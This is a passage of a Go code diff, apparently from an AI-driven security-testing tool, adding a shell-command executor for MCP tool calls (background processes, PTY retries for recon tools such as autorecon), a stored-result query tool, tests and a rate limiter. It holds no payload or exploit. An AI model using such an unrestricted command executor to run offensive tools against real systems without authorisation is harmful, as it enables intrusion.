!= nil { + stdout.Close() + e.logger.Error("后台命令启动失败", + zap.String("command", command), + zap.Error(err), + ) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("后台命令启动失败: %v", err), + }, + }, + IsError: true, + }, nil + } + + // 读取第一行输出(PID) + reader := bufio.NewReader(stdout) + pidLine, err := reader.ReadString('\n') + stdout.Close() + + var actualPid int + if err != nil && err != io.EOF { + e.logger.Warn("读取后台进程PID失败", + zap.String("command", command), + zap.Error(err), + ) + // 如果读取失败,使用shell进程的PID + actualPid = pidCmd.Process.Pid + } else { + // 解析PID + pidStr := strings.TrimSpace(pidLine) + if parsedPid, err := strconv.Atoi(pidStr); err == nil { + actualPid = parsedPid + } else { + e.logger.Warn("解析后台进程PID失败", + zap.String("command", command), + zap.String("pidLine", pidStr), + zap.Error(err), + ) + // 如果解析失败,使用shell进程的PID + actualPid = pidCmd.Process.Pid + } + } + + // 在goroutine中等待shell进程,避免僵尸进程 + go func() { + if err := pidCmd.Wait(); err != nil { + e.logger.Debug("后台命令shell进程执行完成", + zap.String("command", command), + zap.Error(err), + ) + } + }() + + e.logger.Info("后台命令已启动", + zap.String("command", command), + zap.Int("actualPid", actualPid), + ) + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("后台命令已启动\n命令: %s\n进程ID: %d\n\n注意: 后台进程将继续运行,不会等待其完成。", command, actualPid), + }, + }, + IsError: false, + }, nil + } + + // 非后台命令:等待输出 + var output string + var err error + // 若上层提供工具输出增量回调,则边执行边流式读取。 + if cb, ok := ctx.Value(ToolOutputCallbackCtxKey).(ToolOutputCallback); ok && cb != nil { + output, err = streamCommandOutput(ctx, cmd, cb) + if err != nil && shouldRetryWithPTY(output) { + e.logger.Info("检测到系统命令需要 TTY,使用 PTY 重试") + cmd2 := exec.CommandContext(ctx, shell, "-c", command) + if workDir != "" { + cmd2.Dir = workDir + } + applyDefaultTerminalEnv(cmd2) + _ = prepareShellCmdSession(cmd2) + output, err = runCommandWithPTY(ctx, cmd2, cb) + } + } else { + outputBytes, err2 := cmd.CombinedOutput() + output = string(outputBytes) + err = err2 + if err != nil && shouldRetryWithPTY(output) { + e.logger.Info("检测到系统命令需要 TTY,使用 PTY 重试") + cmd2 := exec.CommandContext(ctx, shell, "-c", command) + if workDir != "" { + cmd2.Dir = workDir + } + applyDefaultTerminalEnv(cmd2) + _ = prepareShellCmdSession(cmd2) + output, err = runCommandWithPTY(ctx, cmd2, nil) + } + } + if err != nil { + e.logger.Error("系统命令执行失败", + zap.String("command", command), + zap.Error(err), + zap.String("output", string(output)), + ) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("命令执行失败: %v\n输出: %s", err, string(output)), + }, + }, + IsError: true, + }, nil + } + + e.logger.Info("系统命令执行成功", + zap.String("command", command), + zap.String("output_length", fmt.Sprintf("%d", len(output))), + ) + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: string(output), + }, + }, + IsError: false, + }, nil +} + +// streamCommandOutput 以“边读边回调”的方式读取命令 stdout/stderr。 +// 使用定长块读取,避免按行读取在无换行输出时永久阻塞;ctx 取消时终止进程树。 +func streamCommandOutput(ctx context.Context, cmd *exec.Cmd, cb ToolOutputCallback) (string, error) { + if err := prepareShellCmdSession(cmd); err != nil { + return "", err + } + stdoutPipe, err := cmd.StdoutPipe() + if err != nil { + return "", err + } + stderrPipe, err := cmd.StderrPipe() + if err != nil { + _ = stdoutPipe.Close() + return "", err + } + if err := cmd.Start(); err != nil { + _ = stdoutPipe.Close() + _ = stderrPipe.Close() + return "", err + } + + stopWatch := make(chan struct{}) + go func() { + select { + case <-ctx.Done(): + terminateCmdTree(cmd) + case <-stopWatch: + } + }() + defer close(stopWatch) + + chunks := make(chan string, 64) + var wg sync.WaitGroup + readFn := func(r io.Reader) { + defer wg.Done() + buf := make([]byte, 8192) + for { + n, readErr := r.Read(buf) + if n > 0 { + chunks <- string(buf[:n]) + } + if readErr != nil { + return + } + } + } + + wg.Add(2) + go readFn(stdoutPipe) + go readFn(stderrPipe) + + go func() { + wg.Wait() + close(chunks) + }() + + var outBuilder strings.Builder + var deltaBuilder strings.Builder + lastFlush := time.Now() + + flush := func() { + if deltaBuilder.Len() == 0 { + return + } + cb(deltaBuilder.String()) + deltaBuilder.Reset() + lastFlush = time.Now() + } + + for chunk := range chunks { + outBuilder.WriteString(chunk) + deltaBuilder.WriteString(chunk) + // 简单节流:buffer 大于 2KB 或 200ms 就刷新一次 + if deltaBuilder.Len() >= 2048 || time.Since(lastFlush) >= 200*time.Millisecond { + flush() + } + } + flush() + + // 等待命令结束,返回最终退出状态 + waitErr := cmd.Wait() + return outBuilder.String(), waitErr +} + +// applyDefaultTerminalEnv 为外部工具补齐常见的终端环境变量。 +// 注意:这不会创建 TTY,只是减少某些工具在非交互环境下的“奇怪排版/检测失败”。 +func applyDefaultTerminalEnv(cmd *exec.Cmd) { + if cmd == nil { + return + } + // 仅在未显式设置 Env 时,继承当前进程环境 + if cmd.Env == nil { + cmd.Env = os.Environ() + } + // 如果用户已设置 TERM/COLUMNS/LINES,则不覆盖 + has := func(k string) bool { + prefix := k + "=" + for _, e := range cmd.Env { + if strings.HasPrefix(e, prefix) { + return true + } + } + return false + } + if !has("TERM") { + cmd.Env = append(cmd.Env, "TERM=xterm-256color") + } + if !has("COLUMNS") { + cmd.Env = append(cmd.Env, "COLUMNS=256") + } + if !has("LINES") { + cmd.Env = append(cmd.Env, "LINES=40") + } +} + +func shouldRetryWithPTY(output string) bool { + o := strings.ToLower(output) + // autorecon / python termios 常见报错 + if strings.Contains(o, "inappropriate ioctl for device") { + return true + } + if strings.Contains(o, "termios.error") { + return true + } + // 兜底:stdin 不是 tty + if strings.Contains(o, "not a tty") { + return true + } + return false +} + +// runCommandWithPTY 为子进程分配 PTY,适配需要交互式终端的工具(如 autorecon)。 +// 若 cb != nil,将持续回调增量输出(用于 SSE)。 +func runCommandWithPTY(ctx context.Context, cmd *exec.Cmd, cb ToolOutputCallback) (string, error) { + if runtime.GOOS == "windows" { + // PTY 方案为类 Unix;Windows 走原逻辑 + if cb != nil { + return streamCommandOutput(ctx, cmd, cb) + } + _ = prepareShellCmdSession(cmd) + out, err := cmd.CombinedOutput() + return string(out), err + } + + _ = prepareShellCmdSession(cmd) + ptmx, err := pty.Start(cmd) + if err != nil { + return "", err + } + defer func() { _ = ptmx.Close() }() + + // ctx 取消时尽快终止子进程 + done := make(chan struct{}) + go func() { + select { + case <-ctx.Done(): + _ = ptmx.Close() // 触发读退出 + terminateCmdTree(cmd) + case <-done: + } + }() + defer close(done) + + var outBuilder strings.Builder + var deltaBuilder strings.Builder + lastFlush := time.Now() + flush := func() { + if cb == nil || deltaBuilder.Len() == 0 { + deltaBuilder.Reset() + lastFlush = time.Now() + return + } + cb(deltaBuilder.String()) + deltaBuilder.Reset() + lastFlush = time.Now() + } + + buf := make([]byte, 4096) + for { + n, readErr := ptmx.Read(buf) + if n > 0 { + chunk := string(buf[:n]) + // 统一换行为 \n,避免前端错位 + chunk = strings.ReplaceAll(chunk, "\r\n", "\n") + chunk = strings.ReplaceAll(chunk, "\r", "\n") + outBuilder.WriteString(chunk) + deltaBuilder.WriteString(chunk) + if deltaBuilder.Len() >= 2048 || time.Since(lastFlush) >= 200*time.Millisecond { + flush() + } + } + if readErr != nil { + break + } + } + flush() + + waitErr := cmd.Wait() + return outBuilder.String(), waitErr +} + +// executeInternalTool 执行内部工具(不执行外部命令) +func (e *Executor) executeInternalTool(ctx context.Context, toolName string, command string, args map[string]interface{}) (*mcp.ToolResult, error) { + // 提取内部工具类型(去掉 "internal:" 前缀) + internalToolType := strings.TrimPrefix(command, "internal:") + + e.logger.Info("执行内部工具", + zap.String("toolName", toolName), + zap.String("internalToolType", internalToolType), + zap.Any("args", args), + ) + + // 根据内部工具类型分发处理 + switch internalToolType { + case "query_execution_result": + return e.executeQueryExecutionResult(ctx, args) + default: + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("错误: 未知的内部工具类型: %s", internalToolType), + }, + }, + IsError: true, + }, nil + } +} + +// executeQueryExecutionResult 执行查询执行结果工具 +func (e *Executor) executeQueryExecutionResult(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + // 获取 execution_id 参数 + executionID, ok := args["execution_id"].(string) + if !ok || executionID == "" { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "错误: execution_id 参数必需且不能为空", + }, + }, + IsError: true, + }, nil + } + + // 获取可选参数 + page := 1 + if p, ok := args["page"].(float64); ok { + page = int(p) + } + if page < 1 { + page = 1 + } + + limit := 100 + if l, ok := args["limit"].(float64); ok { + limit = int(l) + } + if limit < 1 { + limit = 100 + } + if limit > 500 { + limit = 500 // 限制最大每页行数 + } + + search := "" + if s, ok := args["search"].(string); ok { + search = s + } + + filter := "" + if f, ok := args["filter"].(string); ok { + filter = f + } + + useRegex := false + if r, ok := args["use_regex"].(bool); ok { + useRegex = r + } + + // 检查结果存储是否可用 + if e.resultStorage == nil { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "错误: 结果存储未初始化", + }, + }, + IsError: true, + }, nil + } + + // 执行查询 + var resultPage *storage.ResultPage + var err error + + if search != "" { + // 搜索模式 + matchedLines, err := e.resultStorage.SearchResult(executionID, search, useRegex) + if err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("搜索失败: %v", err), + }, + }, + IsError: true, + }, nil + } + // 对搜索结果进行分页 + resultPage = paginateLines(matchedLines, page, limit) + } else if filter != "" { + // 过滤模式 + filteredLines, err := e.resultStorage.FilterResult(executionID, filter, useRegex) + if err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("过滤失败: %v", err), + }, + }, + IsError: true, + }, nil + } + // 对过滤结果进行分页 + resultPage = paginateLines(filteredLines, page, limit) + } else { + // 普通分页查询 + resultPage, err = e.resultStorage.GetResultPage(executionID, page, limit) + if err != nil { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("查询失败: %v", err), + }, + }, + IsError: true, + }, nil + } + } + + // 获取元信息 + metadata, err := e.resultStorage.GetResultMetadata(executionID) + if err != nil { + // 元信息获取失败不影响查询结果 + e.logger.Warn("获取结果元信息失败", zap.Error(err)) + } + + // 格式化返回结果 + var sb strings.Builder + sb.WriteString(fmt.Sprintf("查询结果 (执行ID: %s)\n", executionID)) + + if metadata != nil { + sb.WriteString(fmt.Sprintf("工具: %s | 大小: %d 字节 (%.2f KB) | 总行数: %d\n", + metadata.ToolName, metadata.TotalSize, float64(metadata.TotalSize)/1024, metadata.TotalLines)) + } + + sb.WriteString(fmt.Sprintf("第 %d/%d 页,每页 %d 行,共 %d 行\n\n", + resultPage.Page, resultPage.TotalPages, resultPage.Limit, resultPage.TotalLines)) + + if len(resultPage.Lines) == 0 { + sb.WriteString("没有找到匹配的结果。\n") + } else { + for i, line := range resultPage.Lines { + lineNum := (resultPage.Page-1)*resultPage.Limit + i + 1 + sb.WriteString(fmt.Sprintf("%d: %s\n", lineNum, line)) + } + } + + sb.WriteString("\n") + if resultPage.Page < resultPage.TotalPages { + sb.WriteString(fmt.Sprintf("提示: 使用 page=%d 查看下一页", resultPage.Page+1)) + if search != "" { + sb.WriteString(fmt.Sprintf(",或使用 search=\"%s\" 继续搜索", search)) + if useRegex { + sb.WriteString(" (正则模式)") + } + } + if filter != "" { + sb.WriteString(fmt.Sprintf(",或使用 filter=\"%s\" 继续过滤", filter)) + if useRegex { + sb.WriteString(" (正则模式)") + } + } + sb.WriteString("\n") + } + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: sb.String(), + }, + }, + IsError: false, + }, nil +} + +// paginateLines 对行列表进行分页 +func paginateLines(lines []string, page int, limit int) *storage.ResultPage { + totalLines := len(lines) + totalPages := (totalLines + limit - 1) / limit + if page < 1 { + page = 1 + } + if page > totalPages && totalPages > 0 { + page = totalPages + } + + start := (page - 1) * limit + end := start + limit + if end > totalLines { + end = totalLines + } + + var pageLines []string + if start < totalLines { + pageLines = lines[start:end] + } else { + pageLines = []string{} + } + + return &storage.ResultPage{ + Lines: pageLines, + Page: page, + Limit: limit, + TotalLines: totalLines, + TotalPages: totalPages, + } +} + +// buildInputSchema 构建输入模式 +func (e *Executor) buildInputSchema(toolConfig *config.ToolConfig) map[string]interface{} { + schema := map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{}, + "required": []string{}, + } + + // 如果配置中定义了参数,优先使用配置中的参数定义 + if len(toolConfig.Parameters) > 0 { + properties := make(map[string]interface{}) + required := []string{} + + for _, param := range toolConfig.Parameters { + // 跳过 name 为空的参数(避免 YAML 中 name: null 或空导致非法 schema) + if strings.TrimSpace(param.Name) == "" { + e.logger.Debug("跳过无名称的参数", + zap.String("tool", toolConfig.Name), + zap.String("type", param.Type), + ) + continue + } + // 转换类型为OpenAI/JSON Schema标准类型(空类型默认为 string) + openAIType := e.convertToOpenAIType(param.Type) + + prop := map[string]interface{}{ + "type": openAIType, + "description": param.Description, + } + + // JSON Schema/OpenAI 要求 array 类型必须包含 items,否则 API 报 invalid_function_parameters + if openAIType == "array" { + itemType := strings.TrimSpace(param.ItemType) + if itemType == "" { + itemType = "string" + } + prop["items"] = map[string]interface{}{ + "type": e.convertToOpenAIType(itemType), + } + } + + // 添加默认值 + if param.Default != nil { + prop["default"] = param.Default + } + + // 添加枚举选项 + if len(param.Options) > 0 { + prop["enum"] = param.Options + } + + properties[param.Name] = prop + + // 添加到必需参数列表 + if param.Required { + required = append(required, param.Name) + } + } + + schema["properties"] = properties + schema["required"] = required + return schema + } + + // 如果没有定义参数配置,返回空schema + // 这种情况下工具可能只使用固定参数(args字段) + // 或者需要通过YAML配置文件定义参数 + e.logger.Warn("工具未定义参数配置,返回空schema", + zap.String("tool", toolConfig.Name), + ) + return schema +} + +// convertToOpenAIType 将配置中的类型转换为OpenAI/JSON Schema标准类型 +func (e *Executor) convertToOpenAIType(configType string) string { + // 空或 null 类型统一视为 string,避免非法 schema 导致工具调用失败 + if strings.TrimSpace(configType) == "" { + return "string" + } + switch configType { + case "bool": + return "boolean" + case "int", "integer": + return "number" + case "float", "double": + return "number" + case "string", "array", "object": + return configType + default: + // 默认返回原类型,但记录警告 + e.logger.Warn("未知的参数类型,使用原类型", + zap.String("type", configType), + ) + return configType + } +} + +// getExitCode 从错误中提取退出码,如果不是ExitError则返回nil +func getExitCode(err error) *int { + if err == nil { + return nil + } + if exitError, ok := err.(*exec.ExitError); ok { + if exitError.ProcessState != nil { + exitCode := exitError.ExitCode() + return &exitCode + } + } + return nil +} + +// getExitCodeValue 从错误中提取退出码值,如果不是ExitError则返回-1 +func getExitCodeValue(err error) int { + if code := getExitCode(err); code != nil { + return *code + } + return -1 +} diff --git a/security/executor_test.go b/security/executor_test.go new file mode 100644 index 00000000..91cde7c0 --- /dev/null +++ b/security/executor_test.go @@ -0,0 +1,290 @@ +package security + +import ( + "context" + "os" + "path/filepath" + "strings" + "testing" + "time" + + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/storage" + + "go.uber.org/zap" +) + +// setupTestExecutor 创建测试用的执行器 +func setupTestExecutor(t *testing.T) (*Executor, *mcp.Server) { + logger := zap.NewNop() + mcpServer := mcp.NewServer(logger) + + cfg := &config.SecurityConfig{ + Tools: []config.ToolConfig{}, + } + + executor := NewExecutor(cfg, mcpServer, logger) + return executor, mcpServer +} + +// setupTestStorage 创建测试用的存储 +func setupTestStorage(t *testing.T) *storage.FileResultStorage { + tmpDir := filepath.Join(os.TempDir(), "test_executor_storage_"+time.Now().Format("20060102_150405")) + logger := zap.NewNop() + + storage, err := storage.NewFileResultStorage(tmpDir, logger) + if err != nil { + t.Fatalf("创建测试存储失败: %v", err) + } + + return storage +} + +func TestExecutor_ExecuteInternalTool_QueryExecutionResult(t *testing.T) { + executor, _ := setupTestExecutor(t) + testStorage := setupTestStorage(t) + executor.SetResultStorage(testStorage) + + // 准备测试数据 + executionID := "test_exec_001" + toolName := "nmap_scan" + result := "Line 1: Port 22 open\nLine 2: Port 80 open\nLine 3: Port 443 open\nLine 4: error occurred" + + // 保存测试结果 + err := testStorage.SaveResult(executionID, toolName, result) + if err != nil { + t.Fatalf("保存测试结果失败: %v", err) + } + + ctx := context.Background() + + // 测试1: 基本查询(第一页) + args := map[string]interface{}{ + "execution_id": executionID, + "page": float64(1), + "limit": float64(2), + } + + toolResult, err := executor.executeQueryExecutionResult(ctx, args) + if err != nil { + t.Fatalf("执行查询失败: %v", err) + } + + if toolResult.IsError { + t.Fatalf("查询应该成功,但返回了错误: %s", toolResult.Content[0].Text) + } + + // 验证结果包含预期内容 + resultText := toolResult.Content[0].Text + if !strings.Contains(resultText, executionID) { + t.Errorf("结果中应该包含执行ID: %s", executionID) + } + + if !strings.Contains(resultText, "第 1/") { + t.Errorf("结果中应该包含分页信息") + } + + // 测试2: 搜索功能 + args2 := map[string]interface{}{ + "execution_id": executionID, + "search": "error", + "page": float64(1), + "limit": float64(10), + } + + toolResult2, err := executor.executeQueryExecutionResult(ctx, args2) + if err != nil { + t.Fatalf("执行搜索失败: %v", err) + } + + if toolResult2.IsError { + t.Fatalf("搜索应该成功,但返回了错误: %s", toolResult2.Content[0].Text) + } + + resultText2 := toolResult2.Content[0].Text + if !strings.Contains(resultText2, "error") { + t.Errorf("搜索结果中应该包含关键词: error") + } + + // 测试3: 过滤功能 + args3 := map[string]interface{}{ + "execution_id": executionID, + "filter": "Port", + "page": float64(1), + "limit": float64(10), + } + + toolResult3, err := executor.executeQueryExecutionResult(ctx, args3) + if err != nil { + t.Fatalf("执行过滤失败: %v", err) + } + + if toolResult3.IsError { + t.Fatalf("过滤应该成功,但返回了错误: %s", toolResult3.Content[0].Text) + } + + resultText3 := toolResult3.Content[0].Text + if !strings.Contains(resultText3, "Port") { + t.Errorf("过滤结果中应该包含关键词: Port") + } + + // 测试4: 缺少必需参数 + args4 := map[string]interface{}{ + "page": float64(1), + } + + toolResult4, err := executor.executeQueryExecutionResult(ctx, args4) + if err != nil { + t.Fatalf("执行查询失败: %v", err) + } + + if !toolResult4.IsError { + t.Fatal("缺少execution_id应该返回错误") + } + + // 测试5: 不存在的执行ID + args5 := map[string]interface{}{ + "execution_id": "nonexistent_id", + "page": float64(1), + } + + toolResult5, err := executor.executeQueryExecutionResult(ctx, args5) + if err != nil { + t.Fatalf("执行查询失败: %v", err) + } + + if !toolResult5.IsError { + t.Fatal("不存在的执行ID应该返回错误") + } +} + +func TestExecutor_ExecuteInternalTool_UnknownTool(t *testing.T) { + executor, _ := setupTestExecutor(t) + + ctx := context.Background() + args := map[string]interface{}{ + "test": "value", + } + + // 测试未知的内部工具类型 + toolResult, err := executor.executeInternalTool(ctx, "unknown_tool", "internal:unknown_tool", args) + if err != nil { + t.Fatalf("执行内部工具失败: %v", err) + } + + if !toolResult.IsError { + t.Fatal("未知的工具类型应该返回错误") + } + + if !strings.Contains(toolResult.Content[0].Text, "未知的内部工具类型") { + t.Errorf("错误消息应该包含'未知的内部工具类型'") + } +} + +func TestExecutor_ExecuteInternalTool_NoStorage(t *testing.T) { + executor, _ := setupTestExecutor(t) + // 不设置存储,测试未初始化的情况 + + ctx := context.Background() + args := map[string]interface{}{ + "execution_id": "test_id", + } + + toolResult, err := executor.executeQueryExecutionResult(ctx, args) + if err != nil { + t.Fatalf("执行查询失败: %v", err) + } + + if !toolResult.IsError { + t.Fatal("未初始化的存储应该返回错误") + } + + if !strings.Contains(toolResult.Content[0].Text, "结果存储未初始化") { + t.Errorf("错误消息应该包含'结果存储未初始化'") + } +} + +func TestExecuteSystemCommand_BackgroundDoesNotBlockOnChildStdout(t *testing.T) { + executor, _ := setupTestExecutor(t) + // 子进程先向 stdout 写无换行字符再长时间 sleep;若与 echo $pid 共享管道且未重定向子进程 stdout, + // ReadString('\n') 会阻塞到子进程退出。后台包装须将子进程标准流与 PID 行分离。 + ctx, cancel := context.WithTimeout(context.Background(), 4*time.Second) + defer cancel() + args := map[string]interface{}{ + "command": `(sh -c 'printf x; sleep 120') &`, + "shell": "sh", + } + res, err := executor.executeSystemCommand(ctx, args) + if err != nil { + t.Fatalf("executeSystemCommand: %v", err) + } + if res == nil || res.IsError { + t.Fatalf("expected success, got %+v", res) + } + txt := res.Content[0].Text + if !strings.Contains(txt, "后台命令已启动") { + t.Fatalf("unexpected body: %q", txt) + } +} + +func TestPaginateLines(t *testing.T) { + lines := []string{"Line 1", "Line 2", "Line 3", "Line 4", "Line 5"} + + // 测试第一页 + page := paginateLines(lines, 1, 2) + if page.Page != 1 { + t.Errorf("页码不匹配。期望: 1, 实际: %d", page.Page) + } + if page.Limit != 2 { + t.Errorf("每页行数不匹配。期望: 2, 实际: %d", page.Limit) + } + if page.TotalLines != 5 { + t.Errorf("总行数不匹配。期望: 5, 实际: %d", page.TotalLines) + } + if page.TotalPages != 3 { + t.Errorf("总页数不匹配。期望: 3, 实际: %d", page.TotalPages) + } + if len(page.Lines) != 2 { + t.Errorf("第一页行数不匹配。期望: 2, 实际: %d", len(page.Lines)) + } + + // 测试第二页 + page2 := paginateLines(lines, 2, 2) + if len(page2.Lines) != 2 { + t.Errorf("第二页行数不匹配。期望: 2, 实际: %d", len(page2.Lines)) + } + if page2.Lines[0] != "Line 3" { + t.Errorf("第二页第一行不匹配。期望: Line 3, 实际: %s", page2.Lines[0]) + } + + // 测试最后一页 + page3 := paginateLines(lines, 3, 2) + if len(page3.Lines) != 1 { + t.Errorf("第三页行数不匹配。期望: 1, 实际: %d", len(page3.Lines)) + } + + // 测试超出范围的页码(应该返回最后一页) + page4 := paginateLines(lines, 4, 2) + if page4.Page != 3 { + t.Errorf("超出范围的页码应该被修正为最后一页。期望: 3, 实际: %d", page4.Page) + } + if len(page4.Lines) != 1 { + t.Errorf("最后一页应该只有1行。实际: %d行", len(page4.Lines)) + } + + // 测试无效页码(小于1) + page0 := paginateLines(lines, 0, 2) + if page0.Page != 1 { + t.Errorf("无效页码应该被修正为1。实际: %d", page0.Page) + } + + // 测试空列表 + emptyPage := paginateLines([]string{}, 1, 10) + if emptyPage.TotalLines != 0 { + t.Errorf("空列表的总行数应该为0。实际: %d", emptyPage.TotalLines) + } + if len(emptyPage.Lines) != 0 { + t.Errorf("空列表应该返回空结果。实际: %d行", len(emptyPage.Lines)) + } +} diff --git a/security/procattr_unix.go b/security/procattr_unix.go new file mode 100644 index 00000000..96d4efe2 --- /dev/null +++ b/security/procattr_unix.go @@ -0,0 +1,31 @@ +//go:build !windows + +package security + +import ( + "os/exec" + "syscall" +) + +// prepareShellCmdSession 让 shell 子进程在独立会话中运行,便于超时/取消时整组 SIGKILL(含子进程)。 +func prepareShellCmdSession(cmd *exec.Cmd) error { + if cmd == nil { + return nil + } + if cmd.SysProcAttr == nil { + cmd.SysProcAttr = &syscall.SysProcAttr{} + } + cmd.SysProcAttr.Setsid = true + return nil +} + +// terminateCmdTree 尽力终止 cmd 及其进程组(Unix 下 Setsid 后 PGID == 首进程 PID)。 +func terminateCmdTree(cmd *exec.Cmd) { + if cmd == nil || cmd.Process == nil { + return + } + pid := cmd.Process.Pid + if err := syscall.Kill(-pid, syscall.SIGKILL); err != nil { + _ = cmd.Process.Kill() + } +} diff --git a/security/procattr_windows.go b/security/procattr_windows.go new file mode 100644 index 00000000..df7e2eda --- /dev/null +++ b/security/procattr_windows.go @@ -0,0 +1,17 @@ +//go:build windows + +package security + +import "os/exec" + +func prepareShellCmdSession(cmd *exec.Cmd) error { + _ = cmd + return nil +} + +func terminateCmdTree(cmd *exec.Cmd) { + if cmd == nil || cmd.Process == nil { + return + } + _ = cmd.Process.Kill() +} diff --git a/security/ratelimit.go b/security/ratelimit.go new file mode 100644 index 00000000..71795710 --- /dev/null +++ b/security/ratelimit.go @@ -0,0 +1,81 @@ +package security + +import ( + "net/http" + "sync" + "time" + + "github.com/gin-gonic/gin" +) + +// rateLimitEntry 记录某个 IP 的请求窗口信息 +type rateLimitEntry struct { + count int + windowAt time.Time +} + +// RateLimiter 基于 IP 的滑动窗口速率限制器 +type RateLimiter struct { + mu sync.Mutex + entries map[string]*rateLimitEntry + limit int // 窗口内允许的最大请求数 + window time.Duration // 窗口时长 +} + +// NewRateLimiter 创建速率限制器 +func NewRateLimiter(limit int, window time.Duration) *RateLimiter { + rl := &RateLimiter{ + entries: make(map[string]*rateLimitEntry), + limit: limit, + window: window, + } + // 后台定期清理过期条目,防止内存泄漏 + go rl.cleanup() + return rl +} + +// cleanup 每分钟清理一次过期条目 +func (rl *RateLimiter) cleanup() { + ticker := time.NewTicker(1 * time.Minute) + defer ticker.Stop() + for range ticker.C { + rl.mu.Lock() + now := time.Now() + for ip, entry := range rl.entries { + if now.Sub(entry.windowAt) > rl.window { + delete(rl.entries, ip) + } + } + rl.mu.Unlock() + } +} + +// allow 检查指定 IP 是否允许通过 +func (rl *RateLimiter) allow(ip string) bool { + rl.mu.Lock() + defer rl.mu.Unlock() + + now := time.Now() + entry, ok := rl.entries[ip] + if !ok || now.Sub(entry.windowAt) > rl.window { + rl.entries[ip] = &rateLimitEntry{count: 1, windowAt: now} + return true + } + + entry.count++ + return entry.count <= rl.limit +} + +// RateLimitMiddleware 返回 Gin 中间件,对超限请求返回 429 +func RateLimitMiddleware(rl *RateLimiter) gin.HandlerFunc { + return func(c *gin.Context) { + ip := c.ClientIP() + if !rl.allow(ip) { + c.AbortWithStatusJSON(http.StatusTooManyRequests, gin.H{ + "error": "rate limit exceeded, please try again later", + }) + return + } + c.Next() + } +}